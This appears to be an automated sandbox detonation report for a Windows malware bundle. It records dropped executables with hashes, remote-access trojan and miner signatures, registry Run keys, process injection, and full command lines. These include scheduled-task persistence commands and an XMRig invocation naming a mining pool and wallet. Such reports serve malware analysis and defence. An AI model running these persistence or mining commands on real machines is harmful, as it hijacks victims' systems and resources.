SHA512 2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365

C:\Users\Admin\AppData\Roaming\efsui\data.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

memory/336-189-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

memory/1192-191-0x0000000000000000-mapping.dmp

memory/892-193-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/1440-203-0x000000000040823E-mapping.dmp

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

MD5 dfd75a7bf3505b1451149b8d73a359ae
SHA1 8db9aa88468ce61ffa43eaa195aff0eb359310b6
SHA256 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
SHA512 2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365

C:\Users\Admin\AppData\Roaming\efsui\data.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

memory/700-223-0x000000000008BBCC-mapping.dmp

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/2108-234-0x000000000009823E-mapping.dmp

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

memory/1192-239-0x0000000001180000-0x0000000001810000-memory.dmp

memory/2108-240-0x00000000733E0000-0x000000007398B000-memory.dmp

memory/2412-241-0x0000000000000000-mapping.dmp

memory/2488-242-0x0000000000000000-mapping.dmp

memory/2528-243-0x0000000000000000-mapping.dmp

memory/2740-252-0x000000000040748E-mapping.dmp

memory/2740-256-0x00000000733E0000-0x000000007398B000-memory.dmp

memory/2848-257-0x0000000000000000-mapping.dmp

memory/2924-258-0x0000000000000000-mapping.dmp

memory/2936-259-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\efsui\data.exe

MD5 ffc5e092773e0832f96d6c284ada0207
SHA1 92933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256 fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512 ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/2956-261-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

MD5 dfd75a7bf3505b1451149b8d73a359ae
SHA1 8db9aa88468ce61ffa43eaa195aff0eb359310b6
SHA256 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
SHA512 2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365

memory/2996-265-0x0000000000000000-mapping.dmp

memory/2988-266-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

MD5 fb9529e54e1b1bb55666d5df8aeb888a
SHA1 35c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512 e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54

memory/3036-276-0x000000000040823E-mapping.dmp

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

MD5 398ec8f86f7fa6496441719de64b247a
SHA1 16906927268cc0d1c4722f6f2dc2045f8725826c
SHA256 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

MD5 b712972e8c92249a42ae00df0ecfc6fd
SHA1 f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA256 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA512 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65

memory/3028-293-0x00000000000CBBCC-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\li4.exe

MD5 7d3d55fcf649639e1d4f1ed8040259d7
SHA1 13d477f24bf7b471321a10031029e73bc1539d7b
SHA256 b586257b3bcde72f60a2a1ee10fa8c82555fd64914b937ea1ea447f0c9afeabb
SHA512 57cf83f94c534360b4936add8f92e07048df71fe7120aec19f6bfb96d0f63037c92abdb24c2f09611d27ea271615819cf4df260a49d4dbe09580bed047350861

C:\Users\Admin\AppData\Local\Temp\n.exe

MD5 33f2cf749fe3208aa8254a9075e8f8e0
SHA1 3278e5683c83fd524ad22eeaecd7ef03d16f7f54
SHA256 0a98ba2c46bd3e53d6d95b5cb4675638669be16e0939100944ae518a0fe78610
SHA512 9682077c1f2e37555fa17425c49148b7bb9ee365692e1e71b6be3dc457fa937ad2bbe0f458725cb4d39edd6cb89ea3871d3a02f75b71d3bd2198ee59d32ac62b

memory/2176-306-0x000000000040823E-mapping.dmp

memory/2176-310-0x00000000733E0000-0x000000007398B000-memory.dmp

memory/2312-311-0x0000000000000000-mapping.dmp

memory/560-312-0x0000000000000000-mapping.dmp

memory/2504-313-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-05-25 01:11

Reported

2022-05-25 01:16

Platform

win10v2004-20220414-en

Max time kernel

24s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"

Signatures

CyberGate, Rebhip

trojan stealer cybergate

LimeRAT

rat limerat

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\n.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\li4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\moxia.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\moxia.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe N/A

Legitimate hosting services abused for malware hosting/C2

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\n.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\n.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\n.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 C:\Users\Admin\AppData\Local\Temp\n.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3232 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 3232 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 3232 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 3232 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3232 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3232 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3232 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 3232 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 3232 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 2008 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 2008 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 3232 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 3232 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 3232 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 3232 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 3232 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 3232 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 2172 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2172 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2172 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2172 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2172 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
PID 2172 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
PID 2172 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe

"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"

C:\Users\Admin\AppData\Local\Temp\moxia.EXE

"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Users\Admin\AppData\Local\Temp\li4.exe

"C:\Users\Admin\AppData\Local\Temp\li4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

C:\Users\Admin\AppData\Local\Temp\n.exe

"C:\Users\Admin\AppData\Local\Temp\n.exe"

C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1

C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe

C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1

C:\Windows\system32\schtasks.exe

